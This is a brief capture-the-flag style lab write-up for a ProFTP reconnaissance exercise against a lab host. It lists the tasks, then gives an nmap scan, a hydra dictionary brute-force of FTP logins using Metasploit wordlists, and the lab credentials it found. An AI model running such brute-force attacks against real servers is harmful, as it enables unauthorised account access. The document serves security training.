ProFTP Recon: Basics

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine. The target machine will be accessible at demo.ine.local.

Objective: Answer the following questions:

1. What is the version of FTP server?

2. Use the username dictionary /usr/share/metasploit-framework/data/wordlists/common_users.txt and password dictionary /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt to check if any of these credentials work on the system. List all found credentials.

3. Find the password of user “sysadmin” using nmap script.

4. Find seven flags hidden on the server.

Tools

• Nmap

• Hydra

Writeup

nmap -sSVC demo.ine.local

hydra -L /usr/share/wordlists/metasploit/common_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt ftp://demo.ine.local -t 64

ftp demo.ine.local
auditor
chocolate